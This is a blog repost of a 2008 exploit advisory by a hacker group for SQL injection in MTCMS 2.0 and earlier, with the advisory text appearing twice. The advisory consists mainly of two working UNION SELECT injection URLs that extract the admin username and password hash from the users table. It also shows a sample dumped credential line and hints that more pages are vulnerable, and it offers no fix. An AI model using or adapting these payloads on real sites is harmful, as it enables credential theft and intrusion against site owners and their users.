Securities/SecurityFocus Vulnerabilities MTCMS <=2.0 SQL Injection Vulnerbility suvisor 2008. 1. 11. 19:51 MTCMS <=2.0 SQL Injection Vulnerbility Jan 10 2008 06:18PMhadihadi_zedehal_2006 yahoo com ######################################################################### ## ...:::::MTCMS <=2.0 SQL Injection Vulnerbility ::::.... #########################################################################Virangar Security Teamwww.virangar.orgwww.virangar.net--------Discoverd By :hadihadispecial tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra& all virangar members & all hackerzgreetz:to my best friend in the world hadi_aryaie2004----------vules:http://site.com/patch/?a='/**/union/**/select/**/1,concat(0x23,username,0x5f,password,0x23),email,4,5,6,7/**/from/**/users/**/where/**/id=1/*http://site.com/patch/?a=downloads&cid='/**/union/**/select/**/1,concat(0x23,username,0x5f,password,0x23),email,4,5,6,7/**/from/**/users/**/where/**/id=1/*-------------------------------------you can see somting such as:#admin_35a6e23edefc651ef0380b277ce5d709#Admin (at) service (dot) com [email concealed]-------------------------------------MTCMS contains of other bugs in other pages ;)& maybe other versions have Vulnerbility too :) 공유하기 게시글 관리 미로속에 갇힌 뇌 'Securities/SecurityFocus Vulnerabilities' Related Articles Mozilla Firefox Malformed GIF File Denial of Service Vulnerability Microsoft Visual Interdev SLN File Buffer Overflow Vulnerability Word 2007 Email as PDF path disclosure flaw Buffer-overflow in Quicktime Player 7.3.1.70
########################################################################
# #
# ...:::::MTCMS <=2.0 SQL Injection Vulnerbility ::::.... #
########################################################################
Virangar Security Team
www.virangar.org
www.virangar.net
--------
Discoverd By :hadihadi
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
& all virangar members & all hackerz
greetz:to my best friend in the world hadi_aryaie2004
----------
vules:
http://site.com/patch/?a='/**/union/**/select/**/1,concat(0x23,username,
0x5f,password,0x23),email,4,5,6,7/**/from/**/users/**/where/**/id=1/*
http://site.com/patch/?a=downloads&cid='/**/union/**/select/**/1,concat(
0x23,username,0x5f,password,0x23),email,4,5,6,7/**/from/**/users/**/wher
e/**/id=1/*
-------------------------------------
you can see somting such as:
#admin_35a6e23edefc651ef0380b277ce5d709#
Admin (at) service (dot) com [email concealed]
-------------------------------------
MTCMS contains of other bugs in other pages ;)
& maybe other versions have Vulnerbility too :)